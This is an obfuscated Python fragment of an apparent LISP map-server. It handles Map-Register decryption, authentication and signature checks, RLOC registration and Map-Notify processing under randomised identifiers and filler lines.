if 45 - 45: Ii1I * IiII - OOooOOo
if 57 - 57: iII111i % OoO0O00 / OoooooooOO
Ii = bold ( "Decrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( Ii , IiiiO00O0 ) )
if 69 - 69: oO0o
O0Ooooo0 = chacha . ChaCha ( iI1Ii1iiiII1II , oo0O ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + O0Ooooo0 )
if 44 - 44: IiII - II111iiii % Ii1I
if 64 - 64: Ii1I % OoO0O00 + OOooOOo % OoOoOO00 + IiII
if 92 - 92: iII111i * Oo0Ooo - OoOoOO00
if 33 - 33: i11iIiiIii - OoOoOO00 . OOooOOo * II111iiii . Ii1I
if 59 - 59: OoOoOO00
if 29 - 29: iII111i - II111iiii * OoooooooOO * OoooooooOO
if 15 - 15: IiII / OOooOOo / iIii1I11I1II1 / OoOoOO00
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 91 - 91: i11iIiiIii % O0 . Oo0Ooo / I1Ii111
if 62 - 62: Oo0Ooo . II111iiii % OoO0O00 . Ii1I * OOooOOo + II111iiii
if 7 - 7: OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
if 71 - 71: OOooOOo . Ii1I * i11iIiiIii . I11i
if 9 - 9: O0 / I1ii11iIi11i . iII111i . O0 + IiII % I11i
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 27 - 27: i11iIiiIii - I1ii11iIi11i / O0 - i1IIi + I1IiiI * iII111i
iI1iIIIIiiii = lisp_map_register ( )
IiIIIii1iIII1 , packet = iI1iIIIIiiii . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 17 - 17: II111iiii - I1Ii111 - i11iIiiIii - iIii1I11I1II1
iI1iIIIIiiii . sport = sport
if 10 - 10: I1IiiI
iI1iIIIIiiii . print_map_register ( )
if 40 - 40: OoO0O00 * oO0o / OoOoOO00
if 37 - 37: iII111i * oO0o / I1IiiI * I1ii11iIi11i
if 73 - 73: oO0o + O0
if 98 - 98: I11i % oO0o - I1Ii111 % o0oOOo0O0Ooo - IiII
iiiii1i = True
if ( iI1iIIIIiiii . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
iiiii1i = True
if 79 - 79: OoooooooOO . OoOoOO00 * OoO0O00 + I11i / iII111i - Ii1I
if ( iI1iIIIIiiii . alg_id == LISP_SHA_256_128_ALG_ID ) :
iiiii1i = False
if 9 - 9: I1IiiI - IiII . iIii1I11I1II1
if 99 - 99: iII111i / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo / i1IIi / Ii1I . I1Ii111 . I1Ii111
if 56 - 56: ooOoO0o % IiII . OoO0O00 - iIii1I11I1II1 % o0oOOo0O0Ooo % I1IiiI
if 71 - 71: I1IiiI + iII111i
iii = [ ]
if 41 - 41: I1ii11iIi11i
if 90 - 90: IiII * I1Ii111 * I1Ii111 * I1IiiI . OoOoOO00 * iII111i
if 46 - 46: OoOoOO00
if 1 - 1: oO0o + ooOoO0o / iII111i
i11I = None
o0OoOOO = packet
O0o0OO0o00 = [ ]
oOo0o0ooO0OOO = iI1iIIIIiiii . record_count
for i1i1IIIIIIIi in range ( oOo0o0ooO0OOO ) :
OOoo = lisp_eid_record ( )
O0000O00O00OO = lisp_rloc_record ( )
packet = OOoo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 66 - 66: i11iIiiIii % I11i / Oo0Ooo * oO0o
OOoo . print_record ( " " , False )
if 7 - 7: O0 - Ii1I - oO0o
if 95 - 95: i1IIi - OOooOOo / OoOoOO00 + I1ii11iIi11i + O0
if 10 - 10: ooOoO0o - OOooOOo + i1IIi * Ii1I
if 78 - 78: iIii1I11I1II1
O0oiiii1i1i11I = lisp_site_eid_lookup ( OOoo . eid , OOoo . group ,
False )
if 76 - 76: ooOoO0o - i11iIiiIii * I11i / I1IiiI - OOooOOo
i1i1IIiIii1 = O0oiiii1i1i11I . print_eid_tuple ( ) if O0oiiii1i1i11I else None
if 21 - 21: O0 + ooOoO0o
if 53 - 53: Ii1I - II111iiii * iIii1I11I1II1
if 91 - 91: OoOoOO00 % iIii1I11I1II1
if 81 - 81: i11iIiiIii / OoOoOO00 + iIii1I11I1II1
if 65 - 65: o0oOOo0O0Ooo
if 73 - 73: I11i . I1ii11iIi11i - OoO0O00 + OoooooooOO
if 71 - 71: I1IiiI
if ( O0oiiii1i1i11I and O0oiiii1i1i11I . accept_more_specifics == False ) :
if ( O0oiiii1i1i11I . eid_record_matches ( OOoo ) == False ) :
II1i1i = O0oiiii1i1i11I . parent_for_more_specifics
if ( II1i1i ) : O0oiiii1i1i11I = II1i1i
if 53 - 53: Ii1I
if 85 - 85: OoO0O00 + II111iiii / OoO0O00 . II111iiii * OoOoOO00 * I1IiiI
if 19 - 19: iII111i / Ii1I + iIii1I11I1II1 * O0 - Oo0Ooo
if 47 - 47: iIii1I11I1II1 % I1ii11iIi11i
if 33 - 33: oO0o . oO0o / IiII + II111iiii
if 34 - 34: OoO0O00 . OoOoOO00 / i1IIi / OOooOOo
if 12 - 12: o0oOOo0O0Ooo . Oo0Ooo / II111iiii
if 18 - 18: I1Ii111 % II111iiii + Ii1I * Oo0Ooo - OoooooooOO . Oo0Ooo
i1iiii1 = ( O0oiiii1i1i11I and O0oiiii1i1i11I . accept_more_specifics )
if ( i1iiii1 ) :
o0OIiiI1i1Ii1 = lisp_site_eid ( O0oiiii1i1i11I . site )
o0OIiiI1i1Ii1 . dynamic = True
o0OIiiI1i1Ii1 . eid . copy_address ( OOoo . eid )
o0OIiiI1i1Ii1 . group . copy_address ( OOoo . group )
o0OIiiI1i1Ii1 . parent_for_more_specifics = O0oiiii1i1i11I
o0OIiiI1i1Ii1 . add_cache ( )
o0OIiiI1i1Ii1 . inherit_from_ams_parent ( )
O0oiiii1i1i11I . more_specific_registrations . append ( o0OIiiI1i1Ii1 )
O0oiiii1i1i11I = o0OIiiI1i1Ii1
else :
O0oiiii1i1i11I = lisp_site_eid_lookup ( OOoo . eid , OOoo . group ,
True )
if 72 - 72: OoOoOO00 . OoO0O00 . iIii1I11I1II1 + oO0o / ooOoO0o
if 20 - 20: I1ii11iIi11i . II111iiii % I1Ii111 + I1Ii111 / OoooooooOO . Ii1I
iiI1Ii1I = OOoo . print_eid_tuple ( )
if 98 - 98: OoooooooOO - i11iIiiIii - iII111i + Ii1I - I1IiiI
if ( O0oiiii1i1i11I == None ) :
I11oo = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( I11oo , green ( iiI1Ii1I , False ) ,
", matched non-ams {}" . format ( green ( i1i1IIiIii1 , False ) if i1i1IIiIii1 else "" ) ) )
if 75 - 75: OOooOOo
if 25 - 25: iII111i / I1ii11iIi11i - ooOoO0o
if 53 - 53: IiII / OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - iIii1I11I1II1
if 53 - 53: OOooOOo . I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 40 - 40: OoooooooOO + iII111i % I1Ii111 . ooOoO0o
packet = O0000O00O00OO . end_of_rlocs ( packet , OOoo . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 2 - 2: ooOoO0o
continue
if 55 - 55: I11i + i1IIi * OoOoOO00 % Oo0Ooo * II111iiii . I1IiiI
if 98 - 98: I1ii11iIi11i
i11I = O0oiiii1i1i11I . site
if 57 - 57: OOooOOo * I11i . oO0o
if ( i1iiii1 ) :
o0OoO00 = O0oiiii1i1i11I . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( o0OoO00 , False ) , i11I . site_name , green ( iiI1Ii1I , False ) ) )
if 17 - 17: iII111i - OOooOOo * I1IiiI + i1IIi % I1ii11iIi11i
else :
o0OoO00 = green ( O0oiiii1i1i11I . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( o0OoO00 , i11I . site_name , green ( iiI1Ii1I , False ) ) )
if 71 - 71: Ii1I - o0oOOo0O0Ooo - oO0o
if 27 - 27: O0 - iIii1I11I1II1
if 78 - 78: Oo0Ooo / o0oOOo0O0Ooo
if 35 - 35: o0oOOo0O0Ooo . OoO0O00 / o0oOOo0O0Ooo / IiII - I1ii11iIi11i . Oo0Ooo
if 97 - 97: i11iIiiIii + I1ii11iIi11i - I11i . oO0o
if 76 - 76: IiII * II111iiii * I1ii11iIi11i + OoooooooOO - OoOoOO00 . Ii1I
if ( i11I . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( i11I . site_name ) )
packet = O0000O00O00OO . end_of_rlocs ( packet , OOoo . rloc_count )
continue
if 51 - 51: II111iiii % I1Ii111 * O0 . ooOoO0o * OoOoOO00
if 17 - 17: I1IiiI % I11i
if 28 - 28: I1ii11iIi11i * OoooooooOO
if 19 - 19: Oo0Ooo - iII111i % OoOoOO00 * i11iIiiIii / oO0o . i11iIiiIii
if 46 - 46: I1ii11iIi11i
if 50 - 50: OOooOOo * OoO0O00 * OOooOOo % I1IiiI - I1Ii111 * Ii1I
if 88 - 88: OOooOOo . iII111i / I11i
if 1 - 1: iIii1I11I1II1 - Oo0Ooo % OoooooooOO
o0O = iI1iIIIIiiii . key_id
if ( i11I . auth_key . has_key ( o0O ) == False ) : o0O = 0
o000o0OOo = i11I . auth_key [ o0O ]
if 90 - 90: OOooOOo . O0 % I1Ii111
oooOoO0 = lisp_verify_auth ( IiIIIii1iIII1 , iI1iIIIIiiii . alg_id ,
iI1iIIIIiiii . auth_data , o000o0OOo )
OooOoO00 = "dynamic " if O0oiiii1i1i11I . dynamic else ""
if 4 - 4: II111iiii + oO0o + o0oOOo0O0Ooo % IiII % iIii1I11I1II1
I1i1I11I = bold ( "passed" if oooOoO0 else "failed" , False )
o0O = "key-id {}" . format ( o0O ) if o0O == iI1iIIIIiiii . key_id else "bad key-id {}" . format ( iI1iIIIIiiii . key_id )
if 68 - 68: i11iIiiIii
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( I1i1I11I , OooOoO00 , green ( iiI1Ii1I , False ) , o0O ) )
if 79 - 79: OoOoOO00 * Ii1I / I1ii11iIi11i + OOooOOo
if 19 - 19: I1IiiI + I11i + I1IiiI + OoO0O00
if 33 - 33: i11iIiiIii - Ii1I * II111iiii
if 97 - 97: OoO0O00 / o0oOOo0O0Ooo * iIii1I11I1II1
if 5 - 5: I1IiiI
if 27 - 27: i1IIi + oO0o / I1ii11iIi11i + oO0o
ooo0Oo0 = True
iIii = ( lisp_get_eid_hash ( OOoo . eid ) != None )
if ( iIii or O0oiiii1i1i11I . require_signature ) :
iI1IIIiI = "Required " if O0oiiii1i1i11I . require_signature else ""
iiI1Ii1I = green ( iiI1Ii1I , False )
OooO0ooO0o0OO = lisp_find_sig_in_rloc_set ( packet , OOoo . rloc_count )
if ( OooO0ooO0o0OO == None ) :
ooo0Oo0 = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( iI1IIIiI ,
# i1IIi - OoooooooOO * OOooOOo . ooOoO0o + O0 + o0oOOo0O0Ooo
bold ( "failed" , False ) , iiI1Ii1I ) )
else :
ooo0Oo0 = lisp_verify_cga_sig ( OOoo . eid , OooO0ooO0o0OO )
I1i1I11I = bold ( "passed" if ooo0Oo0 else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( iI1IIIiI , I1i1I11I , iiI1Ii1I ) )
if 87 - 87: OOooOOo + I1Ii111 + O0 / oO0o / i11iIiiIii
if 60 - 60: O0 . II111iiii
if 69 - 69: II111iiii / ooOoO0o - OoOoOO00 / OOooOOo
if 52 - 52: OoO0O00 % I11i + o0oOOo0O0Ooo % OoOoOO00
if ( oooOoO0 == False or ooo0Oo0 == False ) :
packet = O0000O00O00OO . end_of_rlocs ( packet , OOoo . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 46 - 46: o0oOOo0O0Ooo % O0
continue
if 30 - 30: oO0o
if 64 - 64: O0
if 70 - 70: oO0o % I1IiiI . iIii1I11I1II1 - Oo0Ooo + OoOoOO00 % O0
if 91 - 91: I1Ii111 - oO0o * ooOoO0o - I1ii11iIi11i + IiII + O0
if 18 - 18: OoOoOO00 / IiII / o0oOOo0O0Ooo . OOooOOo
if 35 - 35: I11i . ooOoO0o % I11i / iII111i / O0 % I11i
if ( iI1iIIIIiiii . merge_register_requested ) :
II1i1i = O0oiiii1i1i11I
II1i1i . inconsistent_registration = False
if 29 - 29: I1Ii111 + Ii1I
if 100 - 100: Ii1I + I1Ii111 / iIii1I11I1II1 / i1IIi % OoOoOO00
if 6 - 6: oO0o + ooOoO0o
if 13 - 13: Oo0Ooo . IiII % iII111i + i1IIi / OOooOOo
if 1 - 1: I11i * i1IIi * Oo0Ooo % O0
if ( O0oiiii1i1i11I . group . is_null ( ) ) :
if ( II1i1i . site_id != iI1iIIIIiiii . site_id ) :
II1i1i . site_id = iI1iIIIIiiii . site_id
II1i1i . registered = False
II1i1i . individual_registrations = { }
II1i1i . registered_rlocs = [ ]
lisp_registered_count -= 1
if 41 - 41: OOooOOo % OoOoOO00
if 82 - 82: I11i . IiII
if 27 - 27: I1Ii111 % O0 * OoooooooOO . Oo0Ooo
iII1 = source . address + iI1iIIIIiiii . xtr_id
if ( O0oiiii1i1i11I . individual_registrations . has_key ( iII1 ) ) :
O0oiiii1i1i11I = O0oiiii1i1i11I . individual_registrations [ iII1 ]
else :
O0oiiii1i1i11I = lisp_site_eid ( i11I )
O0oiiii1i1i11I . eid . copy_address ( II1i1i . eid )
O0oiiii1i1i11I . group . copy_address ( II1i1i . group )
II1i1i . individual_registrations [ iII1 ] = O0oiiii1i1i11I
if 51 - 51: I11i
else :
O0oiiii1i1i11I . inconsistent_registration = O0oiiii1i1i11I . merge_register_requested
if 80 - 80: Oo0Ooo + oO0o
if 76 - 76: I1IiiI * OoooooooOO - i11iIiiIii / I11i / Oo0Ooo
if 82 - 82: IiII % ooOoO0o
O0oiiii1i1i11I . map_registers_received += 1
if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
if 89 - 89: II111iiii % I1ii11iIi11i % IiII . I11i
if 49 - 49: iII111i % i11iIiiIii * I11i - oO0o . OOooOOo . i11iIiiIii
I1iiiII1Ii1i1 = ( O0oiiii1i1i11I . is_rloc_in_rloc_set ( source ) == False )
if ( OOoo . record_ttl == 0 and I1iiiII1Ii1i1 ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 26 - 26: iIii1I11I1II1 + i11iIiiIii % iII111i + I1IiiI + oO0o - ooOoO0o
continue
if 4 - 4: Oo0Ooo - IiII - I11i
if 72 - 72: OoooooooOO
if 19 - 19: Oo0Ooo . OOooOOo
if 58 - 58: IiII % iII111i + i1IIi % I1IiiI % OOooOOo . iII111i
if 85 - 85: i11iIiiIii . o0oOOo0O0Ooo * iII111i . I1ii11iIi11i / I1Ii111 % Ii1I
if 27 - 27: II111iiii . iIii1I11I1II1 / I1ii11iIi11i / i1IIi / iIii1I11I1II1
OoiiIiIiI1I1iii = O0oiiii1i1i11I . registered_rlocs
O0oiiii1i1i11I . registered_rlocs = [ ]
if 33 - 33: OoOoOO00 - I1ii11iIi11i + IiII
if 70 - 70: Ii1I % II111iiii
if 90 - 90: IiII * OoOoOO00 * i1IIi * O0
if 28 - 28: OoOoOO00 . Oo0Ooo - i1IIi * O0
i1Io0 = packet
for Oo0iIIiiIiiI in range ( OOoo . rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
packet = O0000O00O00OO . decode ( packet , None )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 92 - 92: iIii1I11I1II1 / I1IiiI
O0000O00O00OO . print_record ( " " )
if 60 - 60: OoOoOO00 + o0oOOo0O0Ooo + OOooOOo % OoooooooOO
if 51 - 51: OoO0O00
if 60 - 60: ooOoO0o
if 95 - 95: I11i / o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
if ( len ( i11I . allowed_rlocs ) > 0 ) :
oOo0O = O0000O00O00OO . rloc . print_address ( )
if ( i11I . allowed_rlocs . has_key ( oOo0O ) == False ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oOo0O , False ) ) )
if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
if 8 - 8: OoooooooOO * ooOoO0o
O0oiiii1i1i11I . registered = False
packet = O0000O00O00OO . end_of_rlocs ( packet ,
OOoo . rloc_count - Oo0iIIiiIiiI - 1 )
break
if 26 - 26: i11iIiiIii + oO0o - i1IIi
if 71 - 71: I1IiiI % I1Ii111 / oO0o % oO0o / iIii1I11I1II1 + I1Ii111
if 86 - 86: IiII % i1IIi * o0oOOo0O0Ooo - I1Ii111
if 37 - 37: iII111i % I1IiiI - I1ii11iIi11i % I11i
if 35 - 35: O0 - OoooooooOO % iII111i
if 48 - 48: OOooOOo % i11iIiiIii
OooO0ooO0o0OO = lisp_rloc ( )
OooO0ooO0o0OO . store_rloc_from_record ( O0000O00O00OO , None , source )
if 49 - 49: O0 * iII111i + II111iiii - OOooOOo
if 29 - 29: OoooooooOO % II111iiii - Oo0Ooo / IiII - i11iIiiIii
if 64 - 64: iII111i . I1Ii111 + I1Ii111
if 1 - 1: OOooOOo % Oo0Ooo
if 81 - 81: oO0o / I11i % Ii1I . I11i + OoooooooOO
if 31 - 31: OoO0O00
if ( source . is_exact_match ( OooO0ooO0o0OO . rloc ) ) :
OooO0ooO0o0OO . map_notify_requested = iI1iIIIIiiii . map_notify_requested
if 41 - 41: i11iIiiIii - I1ii11iIi11i - II111iiii
if 5 - 5: OoOoOO00 + i1IIi
if 43 - 43: iII111i * I1IiiI
if 20 - 20: I1IiiI . I11i * OoO0O00 . ooOoO0o . II111iiii
if 6 - 6: Ii1I * OoOoOO00 % IiII + I11i
O0oiiii1i1i11I . registered_rlocs . append ( OooO0ooO0o0OO )
if 20 - 20: oO0o
if 34 - 34: i1IIi + oO0o * Oo0Ooo * I1Ii111 % OoooooooOO % ooOoO0o
IIiIiI = ( O0oiiii1i1i11I . do_rloc_sets_match ( OoiiIiIiI1I1iii ) == False )
if 63 - 63: o0oOOo0O0Ooo / IiII - i11iIiiIii
if 99 - 99: O0 + O0 . iIii1I11I1II1 . ooOoO0o * o0oOOo0O0Ooo
if 1 - 1: I1Ii111 - I11i . OoOoOO00
if 72 - 72: II111iiii . O0 . I11i * OoO0O00
if 70 - 70: iII111i % OoooooooOO * I1ii11iIi11i . I11i / OoO0O00
if 6 - 6: O0 . i11iIiiIii
if ( iI1iIIIIiiii . map_register_refresh and IIiIiI and
O0oiiii1i1i11I . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
O0oiiii1i1i11I . registered_rlocs = OoiiIiIiI1I1iii
continue
if 85 - 85: i11iIiiIii / Ii1I + Oo0Ooo / OoOoOO00 - I1IiiI
if 39 - 39: OoO0O00
if 97 - 97: iIii1I11I1II1 . I1IiiI - O0
if 41 - 41: I11i . OoOoOO00 * O0 % Ii1I
if 54 - 54: ooOoO0o
if 13 - 13: I11i
if ( O0oiiii1i1i11I . registered == False ) :
O0oiiii1i1i11I . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 18 - 18: II111iiii * oO0o % i11iIiiIii / IiII . ooOoO0o
O0oiiii1i1i11I . last_registered = lisp_get_timestamp ( )
O0oiiii1i1i11I . registered = ( OOoo . record_ttl != 0 )
O0oiiii1i1i11I . last_registerer = source
if 2 - 2: OoOoOO00 % I1Ii111
if 35 - 35: OOooOOo
if 50 - 50: iIii1I11I1II1 . I1IiiI + i11iIiiIii
if 65 - 65: I11i % I1IiiI
O0oiiii1i1i11I . auth_sha1_or_sha2 = iiiii1i
O0oiiii1i1i11I . proxy_reply_requested = iI1iIIIIiiii . proxy_reply_requested
O0oiiii1i1i11I . lisp_sec_present = iI1iIIIIiiii . lisp_sec_present
O0oiiii1i1i11I . map_notify_requested = iI1iIIIIiiii . map_notify_requested
O0oiiii1i1i11I . mobile_node_requested = iI1iIIIIiiii . mobile_node
O0oiiii1i1i11I . merge_register_requested = iI1iIIIIiiii . merge_register_requested
if 3 - 3: i11iIiiIii % OOooOOo - Ii1I . i1IIi
O0oiiii1i1i11I . use_register_ttl_requested = iI1iIIIIiiii . use_ttl_for_timeout
if ( O0oiiii1i1i11I . use_register_ttl_requested ) :
O0oiiii1i1i11I . register_ttl = OOoo . store_ttl ( )
else :
O0oiiii1i1i11I . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 24 - 24: OOooOOo
O0oiiii1i1i11I . xtr_id_present = iI1iIIIIiiii . xtr_id_present
if ( O0oiiii1i1i11I . xtr_id_present ) :
O0oiiii1i1i11I . xtr_id = iI1iIIIIiiii . xtr_id
O0oiiii1i1i11I . site_id = iI1iIIIIiiii . site_id
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
if 59 - 59: oO0o * OoO0O00 - I11i * I1IiiI
if 60 - 60: iII111i - OoooooooOO / iII111i % OoO0O00 . OoOoOO00 - o0oOOo0O0Ooo
if 71 - 71: iII111i * o0oOOo0O0Ooo * i11iIiiIii * O0
if ( iI1iIIIIiiii . merge_register_requested ) :
if ( II1i1i . merge_in_site_eid ( O0oiiii1i1i11I ) ) :
iii . append ( [ OOoo . eid , OOoo . group ] )
if 77 - 77: OOooOOo % iII111i + I11i / OoOoOO00
if ( iI1iIIIIiiii . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , II1i1i , iI1iIIIIiiii ,
OOoo )
if 50 - 50: OoOoOO00 - i11iIiiIii - OOooOOo . iIii1I11I1II1
if 97 - 97: oO0o % OOooOOo . OoooooooOO * Ii1I
if 100 - 100: I1ii11iIi11i / Ii1I % Oo0Ooo
if ( IIiIiI == False ) : continue
if ( len ( iii ) != 0 ) : continue
if 83 - 83: O0 . I1Ii111 % I1ii11iIi11i
O0o0OO0o00 . append ( O0oiiii1i1i11I . print_eid_tuple ( ) )
if 97 - 97: Oo0Ooo % OoO0O00 * I1ii11iIi11i * ooOoO0o * OoO0O00
if 12 - 12: ooOoO0o
if 56 - 56: i1IIi
if 3 - 3: OOooOOo - Oo0Ooo * Ii1I + i11iIiiIii
if 53 - 53: i1IIi % I1ii11iIi11i
if 65 - 65: I11i + OoOoOO00 - i11iIiiIii
if 72 - 72: i11iIiiIii - iII111i . i11iIiiIii
OOoo = OOoo . encode ( )
OOoo += i1Io0
Iiii = [ O0oiiii1i1i11I . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 61 - 61: oO0o . i11iIiiIii / Ii1I % iII111i
for OooO0ooO0o0OO in OoiiIiIiI1I1iii :
if ( OooO0ooO0o0OO . map_notify_requested == False ) : continue
if ( OooO0ooO0o0OO . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , OOoo , Iiii , 1 , OooO0ooO0o0OO . rloc ,
LISP_CTRL_PORT , iI1iIIIIiiii . nonce , iI1iIIIIiiii . key_id ,
iI1iIIIIiiii . alg_id , iI1iIIIIiiii . auth_len , i11I , False )
if 36 - 36: OoO0O00 + Ii1I / I11i - iII111i % OoO0O00 / Oo0Ooo
if 38 - 38: Ii1I - ooOoO0o - O0 + oO0o . iIii1I11I1II1
if 90 - 90: i1IIi * OoOoOO00
if 27 - 27: iIii1I11I1II1
if 95 - 95: iII111i / ooOoO0o % Ii1I
lisp_notify_subscribers ( lisp_sockets , OOoo , O0oiiii1i1i11I . eid , i11I )
if 44 - 44: OOooOOo . OOooOOo
if 5 - 5: oO0o + OoooooooOO
if 88 - 88: oO0o + OOooOOo
if 14 - 14: I11i / i1IIi
if 56 - 56: OoooooooOO
if ( len ( iii ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , iii )
if 59 - 59: I1ii11iIi11i + OoO0O00
if 37 - 37: IiII * I1IiiI % O0
if 32 - 32: ooOoO0o % II111iiii
if 60 - 60: i11iIiiIii
if 11 - 11: o0oOOo0O0Ooo
if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
if ( iI1iIIIIiiii . merge_register_requested ) : return
if 26 - 26: Ii1I
if 1 - 1: OoOoOO00 . o0oOOo0O0Ooo + Oo0Ooo % Oo0Ooo * I1ii11iIi11i
if 50 - 50: IiII / i1IIi . I1ii11iIi11i
if 75 - 75: I11i * oO0o + OoooooooOO . iII111i + OoO0O00
if 44 - 44: II111iiii
if ( iI1iIIIIiiii . map_notify_requested and i11I != None ) :
lisp_build_map_notify ( lisp_sockets , o0OoOOO , O0o0OO0o00 ,
iI1iIIIIiiii . record_count , source , sport , iI1iIIIIiiii . nonce ,
iI1iIIIIiiii . key_id , iI1iIIIIiiii . alg_id , iI1iIIIIiiii . auth_len ,
i11I , True )
if 65 - 65: I11i . iII111i . I1IiiI - Oo0Ooo % iIii1I11I1II1 / O0
return
if 54 - 54: iII111i - I1Ii111
if 88 - 88: iII111i * OoO0O00 % OoooooooOO / oO0o
if 7 - 7: i1IIi
if 30 - 30: oO0o . i1IIi / I11i
if 23 - 23: i1IIi + oO0o % iII111i - OoO0O00 - i1IIi
if 74 - 74: Ii1I + I11i . OoooooooOO - I1ii11iIi11i
if 2 - 2: oO0o - o0oOOo0O0Ooo
if 80 - 80: i1IIi
if 40 - 40: O0 . ooOoO0o * iII111i . I11i + I1Ii111 % OoO0O00
if 9 - 9: IiII * oO0o - o0oOOo0O0Ooo
def lisp_process_multicast_map_notify ( packet , source ) :
oooO0oo0ooO = lisp_map_notify ( "" )
packet = oooO0oo0ooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 17 - 17: iII111i % Oo0Ooo
if 14 - 14: I1IiiI - I1Ii111 % I1IiiI - II111iiii
oooO0oo0ooO . print_notify ( )
if ( oooO0oo0ooO . record_count == 0 ) : return
if 34 - 34: I1ii11iIi11i * IiII / II111iiii / ooOoO0o * oO0o
iIIiIi11i = oooO0oo0ooO . eid_records
if 8 - 8: OoOoOO00 / oO0o + oO0o * Ii1I
for i1i1IIIIIIIi in range ( oooO0oo0ooO . record_count ) :
OOoo = lisp_eid_record ( )
iIIiIi11i = OOoo . decode ( iIIiIi11i )
if ( packet == None ) : return
OOoo . print_record ( " " , False )
if 71 - 71: I1Ii111 - O0 . oO0o % ooOoO0o / I1Ii111
if 28 - 28: o0oOOo0O0Ooo / oO0o
if 65 - 65: O0 / i1IIi
if 78 - 78: OOooOOo . I11i % Oo0Ooo . OoOoOO00
OoOoooooO00oo = lisp_map_cache_lookup ( OOoo . eid , OOoo . group )
if ( OoOoooooO00oo == None ) :
oooO0O0OOOoo , OoOO0OOOO0 , oOoOoO0Oo0oo = lisp_allow_gleaning ( OOoo . eid , OOoo . group ,
None )
if ( oooO0O0OOOoo == False ) : continue
if 78 - 78: OoOoOO00 % I1Ii111
OoOoooooO00oo = lisp_mapping ( OOoo . eid , OOoo . group , [ ] )
OoOoooooO00oo . add_cache ( )
if 64 - 64: O0 + IiII / ooOoO0o / OoooooooOO . II111iiii / ooOoO0o
if 77 - 77: OoO0O00
if 23 - 23: I11i + o0oOOo0O0Ooo - Ii1I % OoooooooOO
if 70 - 70: o0oOOo0O0Ooo + o0oOOo0O0Ooo . OOooOOo % I11i
if 48 - 48: Oo0Ooo
if 27 - 27: OoOoOO00 . O0 / i11iIiiIii + O0 % OoooooooOO % OoO0O00
if 52 - 52: I1IiiI * oO0o
if ( OoOoooooO00oo . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) ) )
if 93 - 93: i1IIi + I1ii11iIi11i % Oo0Ooo + iIii1I11I1II1 / II111iiii
continue
if 100 - 100: iIii1I11I1II1 / II111iiii / Ii1I * Ii1I - OoO0O00
if 36 - 36: ooOoO0o % i1IIi / OoOoOO00 % OoOoOO00 + Ii1I
OoOoooooO00oo . mapping_source = None if source == "lisp-etr" else source
OoOoooooO00oo . map_cache_ttl = OOoo . store_ttl ( )
if 35 - 35: Ii1I . ooOoO0o - ooOoO0o % OoO0O00 / oO0o
if 33 - 33: I1Ii111 / i11iIiiIii / I1ii11iIi11i
if 44 - 44: OoOoOO00 * Oo0Ooo
if 51 - 51: OOooOOo / IiII % I1Ii111 . OoOoOO00 % Ii1I
if 88 - 88: OoO0O00
if ( len ( OoOoooooO00oo . rloc_set ) != 0 and OOoo . rloc_count == 0 ) :
OoOoooooO00oo . rloc_set = [ ]
OoOoooooO00oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) ) )
if 28 - 28: I1Ii111 - iIii1I11I1II1
continue
if 88 - 88: Oo0Ooo * i1IIi % OOooOOo
if 65 - 65: iII111i . oO0o
Ooo0 = OoOoooooO00oo . rtrs_in_rloc_set ( )
if 81 - 81: oO0o
if 100 - 100: Ii1I * I1IiiI
if 43 - 43: IiII % ooOoO0o - i11iIiiIii - I11i
